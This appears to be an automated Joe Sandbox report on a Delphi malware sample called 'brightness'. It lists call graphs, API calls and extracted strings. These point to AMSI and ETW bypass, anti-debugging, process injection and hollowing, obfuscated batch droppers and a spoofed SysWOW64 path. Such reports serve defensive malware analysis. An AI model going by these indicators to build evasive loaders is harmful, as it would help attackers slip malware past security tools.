28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f4798 call 28f494c call 28f4d20 call 28f4d9c CreateProcessAsUserW 2879->3124 3125 2918f25-29190a8 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f4898 2879->3125 3143 2914105-2914533 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 2908704 call 290e974 call 28f4798 call 28f494c call 28f46a4 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f7e10 2902->3143 3144 29140aa-2914100 call 290e5cc call 28f4d8c call 28f4734 call 28f4d8c call 290df00 2902->3144 2903->2902 3394 29182f2-29183fd call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c 3124->3394 3395 2918276-29182ed call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c 3124->3395 3358 2919854-291ae59 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f46a4 * 2 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c * 16 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 28f46a4 * 2 call 290881c call 2907b90 call 2908184 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c ExitProcess 3125->3358 3359 29190ae-29190bd call 28f4898 3125->3359 3879 2914535-2914576 call 28f4d8c * 2 call 28f4734 call 290df00 3143->3879 3880 291457b-29149c4 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 2908704 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 2908704 call 28f7e10 3143->3880 3144->3143 3359->3358 3380 29190c3-2919396 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 290e974 call 28f480c call 28f494c call 28f46a4 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f7e10 3359->3380 3882 291939c-2919649 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f4d8c * 2 call 28f4734 call 290df00 3380->3882 3883 291964e-291984f call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f49a4 call 2908ba8 3380->3883 3586 2918404-2918724 call 28f49a4 call 290e0c4 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 290cf9c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c 3394->3586 3587 29183ff-2918402 3394->3587 3395->3394 3952 29164cd-2916bf0 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f36a0 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f2f08 call 28f7944 call 28f4798 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f2f08 call 28f7944 call 28f4798 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f36d0 3575->3952 3953 291626f-29164c8 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f4d20 call 28f4d8c call 28f4734 call 290df00 3575->3953 4214 2918726-2918738 call 290857c 3586->4214 4215 291873d-2918f20 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c ResumeThread call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c CloseHandle call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 2907ecc call 2908798 * 6 CloseHandle call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c 3586->4215 3587->3586 3850->3851 4487 2917c8d-2917ca4 call 28f36d0 3851->4487 3879->3880 4673 2914a21-2914c7a call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 2908704 call 28f480c call 28f494c call 28f46a4 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 2908704 call 28f7e10 3880->4673 4674 29149c6-2914a1c call 290e5cc call 28f4d8c call 28f4734 call 28f4d8c call 290df00 3880->4674 3882->3883 3883->3358 3953->3952 4214->4215 4215->3125 4959 2914cd7-29150a7 call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 2908704 call 28f494c call 2908408 Sleep call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f480c call 28f494c call 28f46a4 call 28f4798 call 28f494c call 28f46a4 call 290881c call 28f4d20 call 290de78 call 28f4d20 call 290de78 call 28f480c call 28f494c * 2 MoveFileA call 28f480c call 28f494c * 2 MoveFileA call 28f494c call 28f4d20 call 290de78 call 28f494c call 28f4d20 call 290de78 call 28f494c call 28f4d20 call 290de78 4673->4959 4960 2914c7c-2914cd2 call 290e5cc call 28f4d8c call 28f4734 call 28f4d8c call 290df00 4673->4960 4674->4673 4959->2014 4960->4959
                APIs
                • InetIsOffline.URL(00000000,00000000,0291B3D5,?,?,?,000002F7,00000000,00000000), ref: 0290F0E2
                  • Part of subcall function 0290881C: LoadLibraryA.KERNEL32(00000000,00000000,02908903), ref: 02908850
                  • Part of subcall function 0290881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02908903), ref: 02908860
                  • Part of subcall function 0290881C: GetProcAddress.KERNEL32(74AE0000,00000000), ref: 02908879
                  • Part of subcall function 0290881C: FreeLibrary.KERNEL32(74AE0000,00000000,02952388,Function_000065D8,00000004,02952398,02952388,000186A3,00000040,0295239C,74AE0000,00000000,00000000,00000000,00000000,02908903), ref: 029088E3
                  • Part of subcall function 0290EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0290F3CC,UacInitialize,0295237C,0291B40C,UacScan,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString), ref: 0290EFCE
                  • Part of subcall function 0290EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0290EFE0
                  • Part of subcall function 0290F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0290F034
                  • Part of subcall function 0290F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0290F046
                  • Part of subcall function 0290F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0290F05D
                  • Part of subcall function 028F7E10: GetFileAttributesA.KERNEL32(00000000,?,0290FD00,ScanString,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanString,0295237C,0291B40C,UacScan,0295237C,0291B40C,UacInitialize), ref: 028F7E1B
                  • Part of subcall function 028FC2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02A468C8,?,02910032,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession), ref: 028FC2FB
                  • Part of subcall function 0290DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E01F
                  • Part of subcall function 0290DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0290E0B4), ref: 0290E04F
                  • Part of subcall function 0290DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0290E064
                  • Part of subcall function 0290DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0290E090
                  • Part of subcall function 0290DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0290E099
                  • Part of subcall function 028F7E34: GetFileAttributesA.KERNEL32(00000000,?,02912E7D,ScanString,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,Initialize), ref: 028F7E3F
                  • Part of subcall function 028F7FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0291301B,OpenSession,0295237C,0291B40C,ScanString,0295237C,0291B40C,Initialize,0295237C,0291B40C,ScanString,0295237C,0291B40C), ref: 028F7FD5
                  • Part of subcall function 0290DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DFD2), ref: 0290DF3F
                  • Part of subcall function 0290DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0290DF79
                  • Part of subcall function 0290DF00: NtWriteFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000,00000001), ref: 0290DFA6
                  • Part of subcall function 0290DF00: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,00100002,?,?,00000000,00000000), ref: 0290DFAF
                  • Part of subcall function 02908798: LoadLibraryW.KERNEL32(bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize,029523A4,0290A774,UacScan), ref: 029087AC
                  • Part of subcall function 02908798: GetProcAddress.KERNEL32(00000000,BCryptVerifySignature), ref: 029087C6
                  • Part of subcall function 02908798: FreeLibrary.KERNEL32(00000000,00000000,BCryptVerifySignature,bcrypt,?,00000000,00000000,029523A4,0290A3BF,ScanString,029523A4,0290A774,ScanBuffer,029523A4,0290A774,Initialize), ref: 02908802
                  • Part of subcall function 02908704: LoadLibraryW.KERNEL32(amsi), ref: 0290870D
                  • Part of subcall function 02908704: FreeLibrary.KERNEL32(00000000,00000000,?,?,00000006,?,?,000003E7,00000040,?,00000000,DllGetClassObject), ref: 0290876C
                • Sleep.KERNEL32(00002710,00000000,00000000,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,ScanBuffer,0295237C,0291B40C,OpenSession,0295237C,0291B40C,0291B764), ref: 02914DEB
                  • Part of subcall function 0290DE78: RtlInitUnicodeString.NTDLL(?,?), ref: 0290DEA0
                  • Part of subcall function 0290DE78: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0290DEF2), ref: 0290DEB6
                  • Part of subcall function 0290DE78: NtDeleteFile.NTDLL(?), ref: 0290DED5
                • MoveFileA.KERNEL32(00000000,00000000), ref: 02914FEB
                • MoveFileA.KERNEL32(00000000,00000000), ref: 02915041
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: File$LibraryPath$AddressModuleNameProc$FreeHandleLoadName_$AttributesCloseCreateMove$CheckDebuggerDeleteDirectoryInetInformationInitOfflineOpenPresentQueryReadRemoteSleepStringUnicodeWrite
                • String ID: .url$@echo offset "EPD=sPDet "@% or%e%.%c%%h%.o%o%or$@echo offset "MJtc=Iet "@%r%e%%c%r%h%%o%$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\aken.pif$C:\Users\Public\alpha.pif$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\SysWOW64\\$C:\\Windows \\SysWOW64\\svchost.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$D2^Tyj}~TVrgoij[Dkcxn}dmu$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FX.c$FindCertsByIssuer$FlushInstructionCache$GET$GZmMS1j$GetProcessMemoryInfo$GetProxyDllInfo$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MiniDumpReadDumpStream$MiniDumpWriteDump$NEO.c$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenObjectAuditAlarm$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RetailTracerEnable$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$SLGetGenuineInformation$SLGetSLIDList$SLIsGenuineLocalEx$SLLoadApplicationPolicies$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$advapi32$bcrypt$dbgcore$endpointdlp$http$ieproxy$kernel32$lld.SLITUTEN$mssip32$ntdll$psapi$psapi$smartscreenps$spp$sppc$sppwmi$sys.thgiseurt$tquery$wintrust$@echo off@% %e%%c%o%h% %o%rrr% %%o%%f% %f%o%s%
                • API String ID: 2010126900-181751239
                • Opcode ID: ac5dee0c9f5d7e5ae78e8a461f9a2444be8e912c8a17c941940ce77f992690e3
                • Instruction ID: 69594a8282b5b428f0e151bf9048729734c18564be39667064264813b5d4b48d
                • Opcode Fuzzy Hash: ac5dee0c9f5d7e5ae78e8a461f9a2444be8e912c8a17c941940ce77f992690e3
                • Instruction Fuzzy Hash: 6F24FA3CB5021C8FDB51EB68DC90ADE73BBBF94304F1081E2A609E7255DA70AE918F55

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 5547 28f5a78-28f5ab9 GetModuleFileNameA RegOpenKeyExA 5548 28f5afb-28f5b3e call 28f58b4 RegQueryValueExA 5547->5548 5549 28f5abb-28f5ad7 RegOpenKeyExA 5547->5549 5554 28f5b62-28f5b7c RegCloseKey 5548->5554 5555 28f5b40-28f5b5c RegQueryValueExA 5548->5555 5549->5548 5550 28f5ad9-28f5af5 RegOpenKeyExA 5549->5550 5550->5548 5552 28f5b84-28f5bb5 lstrcpynA GetThreadLocale GetLocaleInfoA 5550->5552 5556 28f5c9e-28f5ca5 5552->5556 5557 28f5bbb-28f5bbf 5552->5557 5555->5554 5558 28f5b5e 5555->5558 5560 28f5bcb-28f5be1 lstrlenA 5557->5560 5561 28f5bc1-28f5bc5 5557->5561 5558->5554 5562 28f5be4-28f5be7 5560->5562 5561->5556 5561->5560 5563 28f5be9-28f5bf1 5562->5563 5564 28f5bf3-28f5bfb 5562->5564 5563->5564 5565 28f5be3 5563->5565 5564->5556 5566 28f5c01-28f5c06 5564->5566 5565->5562 5567 28f5c08-28f5c2e lstrcpynA LoadLibraryExA 5566->5567 5568 28f5c30-28f5c32 5566->5568 5567->5568 5568->5556 5569 28f5c34-28f5c38 5568->5569 5569->5556 5570 28f5c3a-28f5c6a lstrcpynA LoadLibraryExA 5569->5570 5570->5556 5571 28f5c6c-28f5c9c lstrcpynA LoadLibraryExA 5570->5571 5571->5556
                APIs
                • GetModuleFileNameA.KERNEL32(00000000,?,00000105,028F0000,0291E790), ref: 028F5A94
                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AB2
                • RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,028F0000,0291E790), ref: 028F5AD0
                • RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 028F5AEE
                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 028F5B37
                • RegQueryValueExA.ADVAPI32(?,028F5CE4,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,028F5B7D,?,80000001), ref: 028F5B55
                • RegCloseKey.ADVAPI32(?,028F5B84,00000000,?,?,00000000,028F5B7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 028F5B77
                • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028F5B94
                • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028F5BA1
                • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028F5BA7
                • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028F5BD2
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C19
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C29
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028F5C51
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028F5C61
                • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028F5C87
                • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028F5C97
                Strings
                Memory Dump Source
                • Source File: 00000007.00000002.3359706191.00000000028F1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028F0000, based on PE: true
                • Associated: 00000007.00000002.3359688491.00000000028F0000.00000002.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359758086.000000000291E000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359809444.0000000002952000.00000040.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A47000.00000004.00001000.00020000.00000000.sdmpDownload File
                • Associated: 00000007.00000002.3359847003.0000000002A49000.00000004.00001000.00020000.00000000.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_7_2_28f0000_brightness.jbxd
                Similarity
                • API ID: lstrcpyn$LibraryLoadOpen$LocaleQueryValue$CloseFileInfoModuleNameThreadlstrlen
                • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                • API String ID: 1759228003-2375825460
                • Opcode ID: fe8b462e5e04cf6be75046830ad1554678978166be5461486acceddfcf82c74d
                • Instruction ID: 50f0be4458978c2e47f1d282a1b79053d3e40cff412d0d582aaac5ed7f68ddf5
                • Opcode Fuzzy Hash: fe8b462e5e04cf6be75046830ad1554678978166be5461486acceddfcf82c74d
